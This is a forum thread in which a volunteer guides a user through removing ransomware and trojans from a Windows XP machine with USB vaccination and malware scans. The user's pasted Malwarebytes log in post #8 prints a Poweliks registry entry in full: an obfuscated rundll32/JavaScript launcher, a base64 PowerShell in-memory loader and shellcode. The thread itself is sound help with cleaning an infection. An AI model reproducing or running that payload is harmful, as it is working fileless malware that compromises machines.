Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Lots of viruses (including ransomware), but MalwareBytes can't find anything?


  • This topic is locked This topic is locked
13 replies to this topic

#1 Suiteheart

Suiteheart

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:39 PM

Posted 16 November 2015 - 08:38 PM

Hello,

 

I have been hit with Cryptowall 3.0 and similar ransomware infections multiple times. My computer lags, crashes, and bluescreens often. There are tons of cmd.exe's and msiexec.exe's running on it at all times that just reappear whenever I try to end them. Certain programs can't open. I can tell my computer is infected but scans by MalwareBytes bring up nothing. 

 

There are a few things I would like to save that I'm preeeeetty sure haven't been encrypted, but I wouldn't want to move a virus to another clean computer by using a flash drive, and I'm not sure how good online cloud services are at detecting and removing viruses attached to files uploaded from an infected computer. Is there any way I could save these files and keep my other computers safe from the same viruses? Also, how can I make sure flash drives I've plugged into my infected computer do not contain any viruses so that I can use them again? 

 

I'm running 32bit Windows XP, SP3. Please let me know if you need any more information!

 

Thank you!! :)



BC AdBot (Login to Remove)

 


#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,617 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:39 PM

Posted 20 November 2015 - 04:44 PM

Greetings Suiteheart and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. Please do this.

===================================================

Panda USB Vaccine

--------------------
  • From a clean computer, please download Panda USB Vaccine and save it to your desktop
  • Double-click the icon to install the program to C:\Program Files\Panda USB Vaccine.
  • Read and accept the license agreement, then click Next.
  • When setup completes, make sure "Launch Panda USB Vaccine" is checked and click Finish to open the program.
  • Click the Vaccinate computer button. It should now show a green checkmark and confirm Computer vaccinated.
  • Hold down the Shift key and insert your external drive.
  • When the name of the drive appears in the dialog box, click the button to Vaccinate USB drive(s).
  • Exit the program when done
  • Leave the external drive attached to your computer
Note: Computer Vaccination will prevent any AutoRun file from running, regardless of whether the removable device is infected or not. USB Vaccination disables the autorun file so it cannot be read, modified or replaced and creates an AUTORUN_.INF as protection against malicious code. Once USB drives have been vaccinated, they cannot be reversed except with a format, meaning you will have to manually attempt to run something from the USB device rather than it running on its own simply by inserting the device. If you need to reformat the USB device to reverse this protection be sure to back up your data files first or they will be lost during the formatting process.

===================================================

Malwarebytes Anti-Malware Free and Malwarebytes Chameleon Including External Drive

----------
  • Download Malwarebytes Anti-Malware Free and save it to your desktop
  • Double click the desktop icon, click Run, then OK
  • Click Next
  • Select I accept the agreement then continue to click Next then finally click Install
  • Uncheck Enable free trial of Malwarebytes Anti-Malware Premium if you do not want the free trial of the paid version, then click Finish
  • If you are notified the Database is out of date click Update Now
  • Attach any external drives you want to scan if not already attached
  • Click the Scan button near the top
  • Select Custom Scan then click Scan Now >>
  • Place a check mark in any additonal drives you would like to scan
  • Click Start Scan

----------
Note: If Malwarebytes will not launch please do the following to launch Malwarebytes Chameleon:
Click Start (Start, Search, All files and folders for Windows XP) then type mbam
Double click one of the four following files (if one does not work try the next one, and so on) - A black command window will open. Follow those instructions until the Malwarebytes program starts the scan

mbam-chameleon.scr
mbam-chameleon
mbam-chameleon.exe
mbam-chameleon.com

----------

  • When completed click the down arrow on Export Log and select Text file (*.txt)
  • Save the file to your desktop as MBAM
  • Click Apply Actions then restart your computer if requested
  • Copy and past the contents of MBAM.txt in your reply
===================================================

ESET Online Scanner Including External Device

--------------------

I'd like us to scan your machine with ESET OnlineScan Including External Device This process may may take several hours, that is normal
  • Attach your external device
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click Run ESET Online Scanner.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the icon on your desktop.
  • Check YES, I accept the Terms of Use.
  • Click the Start button.
  • Click Enable detection of potentially unwanted applications
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Remove found threats
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
    • In the Current scan targets line click Change...
    • Place an additional check mark next to any attached external drives
    • Click OK, then Start
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Copy and paste the information in your next reply. Note: If no malware was found you will not get a log.
  • Click the Back button.
  • Click the Finish button.
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Malwarebytes log
  • ESET log

Edited by Oh My!, 20 November 2015 - 04:47 PM.

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 Suiteheart

Suiteheart
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:39 PM

Posted 21 November 2015 - 05:08 PM

Hello Gary! Sure, feel free to call me Marco! :)

 

Before I start, I have two questions about Panda USB Vaccine:

 

1. I am on a clean computer and can vaccinate it right now. However, I am afraid to vaccinate my USB drives because they are both plugged into the infected computer, and I don't want to take them out and plug them into this one, in case they already have viruses on them that can spread to and infect a clean computer. 

2. Which brings me to my next question. Is there a possibility that, even if I've disabled AutoRun, that if I access the drive in any way, the viruses inside can activate themselves and infect my computer? Even if the file I open from the drive is no way related to a virus? Viewing them from the computer they're currently attached to, I don't see any suspicious files that might be viruses, so I assume they'd be hidden. Which is, of course, exactly what I'm worried about - invisible files infecting my computer from the external drive.

 

I'm not computer savvy at all, so maybe I'm just missing something?

 

Also, do you need my FRST results? 

 

Any way, thank you so much for your help! :D



#4 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,617 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:39 PM

Posted 21 November 2015 - 06:40 PM

Hi Marco, nice to meet you.

The danger in attaching a USB you suspect may be infected comes from an Autorun infection on the USB that launches immediately upon insertion or the launching of a malicious file existing on the USB. By holding down the Shift Key when inserting the USB you are bypassing any Autorun feature. When Panda is run on the USB it actually locks up any Autorun feature so neither a malicious or legitimate Autorun feature is active.

If you follow the steps provided you will not transfer any potential malware onto your clean computer. The USB device remains passive while it is being evaluated and nothing will run without being launched. The scan programs will not launch anything on the USB

I don't need any FRST reports if you believe your main computer is clean.

Does this answer your questions?
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#5 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,617 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:39 PM

Posted 24 November 2015 - 09:50 AM

Greetings,

===================================================

3 Day Bump

It has been more than 3 days since my last post.
  • Do you still need help with this?
  • If after 48hrs you have not replied to this thread then it will have to be closed.

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#6 Suiteheart

Suiteheart
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:39 PM

Posted 24 November 2015 - 08:11 PM

Ah, yes, apologies!

 

Thanks for answering my questions, that helped a lot :)

 

I vaccinated my computer with Panda USB vaccine. Everything went well and no infections were transferred, just like you said! I am now running a scan with MalwareBytes.



#7 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,617 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:39 PM

Posted 24 November 2015 - 08:14 PM

Great, let me know.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#8 Suiteheart

Suiteheart
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:39 PM

Posted 25 November 2015 - 12:37 AM

I'm going to go ahead and post the MalwareBytes log. Here you go!

 

 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 11/24/2015
Scan Time: 7:58:43 PM
Logfile: MBAM-saveresults.txt
Administrator: Yes
 
Version: 2.2.0.1024
Malware Database: v2015.11.24.07
Rootkit Database: v2015.11.23.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows XP Service Pack 3
CPU: x86
File System: NTFS
User: Ripley
 
Scan Type: Custom Scan
Result: Completed
Objects Scanned: 321834
Time Elapsed: 1 hr, 26 min, 52 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 14
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Agent, C:\Documents and Settings\Ripley\Application Data\Microsoft\Crypto\RSA\cert_v128_0.tpl, , [488f136e870477bfdd6cc5653fc5629e], 
Trojan.Bedep, c:\documents and settings\all users\application data\{34f9e14e-0cc0-4146-8bab-1c06fafdac47}\dps.dll, , [eee9522ff09b71c5a1e47aa1b1508779], 
 
Registry Keys: 2
Trojan.Bedep, HKLM\SOFTWARE\CLASSES\CLSID\{FE01A8A8-A5C7-4C67-9A27-8A6A34E6E58E}, , [eee9522ff09b71c5a1e47aa1b1508779], 
Trojan.Poweliks, HKLM\SOFTWARE\CLASSES\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LOCALSERVER32\ ^ , , [9542f0913d4eb086b7ec91713dc3eb15], 
 
Registry Values: 11
Ransom.FileLocker, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|d26c9bf, C:\WINDOWS\system32\config\systemprofile\Application Data\d26c9bf.exe, , [25b292ef63289a9cf1132881f20f4db3]
Ransom.FileLocker, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE|*26c9bf, C:\WINDOWS\system32\config\systemprofile\Application Data\d26c9bf.exe, , [25b292ef63289a9cf1132881f20f4db3]
Ransom.FileLocker, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|d26c9bf, C:\WINDOWS\system32\config\systemprofile\Application Data\d26c9bf.exe, , [25b292ef63289a9cf1132881f20f4db3]
Ransom.FileLocker, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE|*26c9bf, C:\WINDOWS\system32\config\systemprofile\Application Data\d26c9bf.exe, , [25b292ef63289a9cf1132881f20f4db3]
Spyware.PasswordStealer, HKU\S-1-5-21-448539723-1677128483-725345543-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|{7223E482-75AD-D8F9-2F9C-AA0A8BE69115}, "C:\Documents and Settings\Ripley\Application Data\Educed\heaqk.exe", , [4295e69b2e5da98df3623a3d22dffe02]
Spyware.PasswordStealer, HKU\S-1-5-21-448539723-1677128483-725345543-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|{A689A69B-37B4-0C53-2F9C-AA0A8BE69115}, "C:\Documents and Settings\Ripley\Application Data\Educed\heaqk.exe", , [4295e69b2e5da98df3623a3d22dffe02]
Trojan.FakeMS.ED, HKU\S-1-5-21-448539723-1677128483-725345543-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|UalyItjag, regsvr32.exe "C:\Documents and Settings\All Users\Application Data\UalyItjag\TadaHjebd.aam", , [7c5b562b0784d561f8679693669e8b75]
Rootkit.Rovnix.E, HKU\S-1-5-21-448539723-1677128483-725345543-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|BackUp3962972837, C:\Documents and Settings\Administrator\Application Data\BackUp3962972837.exe, , [ba1d2d54870489adfa49bef658abf808]
Trojan.Poweliks, HKLM\SOFTWARE\CLASSES\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LOCALSERVER32|a, rundll32.exe javascript:"qhpj5\..\mshtml,RunHTMLApplication ";eval("usxz)odv!@buhwdYNckdbu)#VRbshqu/Ridmm#((/Sto)#$vhoehs$]]rxrudl23]]vhoenvrqnvdsridmm]]w0/1]]qnvdsridmm/dyd!%25ysu5<)fq!&ijml;]]rnguv`sd]]bm`rrdr]]bmrhe]]z62D618D@,4E82,5C3D,CCC1,88C6829E@8D5|]]mnb`mrdswds23&(/`/rqmhu)(:hdy!)ZUdyu/Dobnehof\\;;@RBHH/FduRushof)ZBnowdsu\\;;GsnlC`rd75Rushof)%25ysu5Z2\\(((#-1-0(:|b`ubi)ysu5(z|:bmnrd)(:".replace(/./g,function(srf9){return(String.fromCharCode(srf9.charCodeAt()^1));})) dHJ5e2Z1bmN0aW9uIGdke1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1R5cGVbXV0gJFBhcmFtZXRlcnMsW1BhcmFtZXRlcihQb3NpdGlvbj0xKV0gW1R5cGVdICRSZXR1cm5UeXBlPVtWb2lkXSk7JFR5cGVCdWlsZGVyPVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkRlZmluZUR5bmFtaWNBc3NlbWJseSgoTmV3LU9iamVjdCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseU5hbWUoIlJlZmxlY3RlZERlbGVnYXRlIikpLFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgiSW5NZW1vcnlNb2R1bGUiLCRmYWxzZSkuRGVmaW5lVHlwZSgidCIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3R7JF8uR2xvYmFsQXNzZW1ibHlDYWNoZSAtQW5kICRfLkxvY2F0aW9uLlNwbGl0KCJcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR4cnQ0WzRdKTtbVWludDMyW11dICRvcD0wOyhbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ2Ega2VybmVsMzIuZGxsIFZpcnR1YWxQcm90ZWN0KSwoZ2QgQChbQnl0ZVtdXSxbVUludDMyXSxbVUludDMyXSxbVUludDMyW11dKSAoW0ludFB0cl0pKSkpLkludm9rZSgkcCwkcC5MZW5ndGgsMHg0MCwkb3ApOyhbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ2EgdXNlcjMyLmRsbCBDYWxsV2luZG93UHJvY0EpLChnZCBAKFtCeXRlW11dLFtCeXRlW11dLFtVSW50MzJdLFtVSW50MzJdLFtVSW50MzJdKSAoW0ludFB0cl0pKSkpLkludm9rZSgkcCwkcCwwLDAsMCk7fWNhdGNoe31zbGVlcCgxKTtleGl0Ow== VYvsg+xoamtYamVmiUWYWGpyZolFmlhqbmaJRZxYamVmiUWeWGpsZolFoFhqM2aJRaJYajJmiUWkWGouZolFplhqZGaJRahYamxmiUWqWGaJRaxmiUWuZKEwAAAAx0XAVmlydMdFxHVhbEHHRchsbG9jxkXMAItADFODwAxWx0XQTG9hZMdF1ExpYnLHRdhhcnlBxkXcAMdFsEdldFDHRbRyb2NBx0W4ZGRyZWbHRbxzc8ZFvgCLyFeLCWaDeSwYdSWLcTCNVZgz/yvyjRR+ilQVmDJUfZj2wt91BkeD/wxy6oP/DHQ5O8h1zotVCItCPItEEHiDZfgAA8KLeCCLcByLWCSLQBgD8gPaA/qJdeiJXeyJReSFwA+EggAAAOsLi1EY68mLXeyLdeiLRfiLDIcPtwRDizSGg2X8AAPKiU30jUXQA/IpRfSLRfyLXfQD2IpEBdA6RB3QdQn/RfyDffwNcuWDffwNdQOJdeCJTfSNTbAzwClN9ItN9IpcBbADyDpcDbB1BkCD+A9y64P4D3UDiXXw/0X4i0X4O0XkcoWNRcBQUv9V8It1CIueQBEAAIHGBBEAAGpAaAAwAAAD3v9zUGoA/9CJRfiFwA+EFgEAAItLVINl9ACL+POkD7dLFI1UGSAzyWY7SwZzM4tKCIsyO852AovOhcl0FYt9CItyDIHHBBEAAAP3i3oEA/jzpA+3Swb/RfSDwig5TfRyzYtwPAPwi46AAAAAg3wBDAB0SY18AQyLDwPIUf9V4IlF5IXAdCuLXwQDXfjrHosDhcB5BQ+3wOsHi034jUQIAlD/deT/VfCJA4PDBIM7AHXdi0X4g8cUgz8AdbuLjqQAAACJTeCLjqAAAACL2CteNAPIg2X0AOs2i1XgOVX0czWNVvjR6nQijXkIiVXwD7cXZoXSdAyB4v8PAAAD0AMRARqDxwL/TfB15AF19APOi3EEhfZ1w4tIPItMCChqAGoB/3UIA8j/0esCM8BfXlvJwhAAVYvsg+xoamtYamVmiUWYWGpyZolFmlhqbm


#9 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,617 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:39 PM

Posted 25 November 2015 - 10:00 AM

As you already know, your computer was quite infected. If you haven't quarantined those entries you should do so.

Let me know when you are all set then I will provide some closing information.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#10 Suiteheart

Suiteheart
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:39 PM

Posted 25 November 2015 - 01:20 PM

Oh, yes, yes it was! I have quarantined everything and my computer is running just fine right now.

 

Ready when you are, unless you need my ESET Online Scanner logs? 

 

Thank you so much for all your help! 



#11 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,617 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:39 PM

Posted 25 November 2015 - 01:44 PM

No, I think we are all set. I would just like to leave you with some information to review if you are interested.

===================================================

Keeping Your Computer Safe

----------

Lawrence Abrams, the founder of BleepingComputer.com, has developed an excellent tutorial which will provide you with the information you need to know to keep your computer secure and clean. Please take the time to read:In addition, here are some more links you might find of interest:I will leave this topic open for just a brief period of time in case you have any further issues then it will be closed shortly thereafter.

Thank you for placing your trust in BleepingComputer. It was a pleasure serving you. OhMy_done.gif
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#12 Suiteheart

Suiteheart
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:39 PM

Posted 25 November 2015 - 02:21 PM

Oh, wonderful! Thank you so, so much. 



#13 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,617 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:39 PM

Posted 25 November 2015 - 02:47 PM

:thumbsup2:
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#14 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,617 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:39 PM

Posted 26 November 2015 - 09:17 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users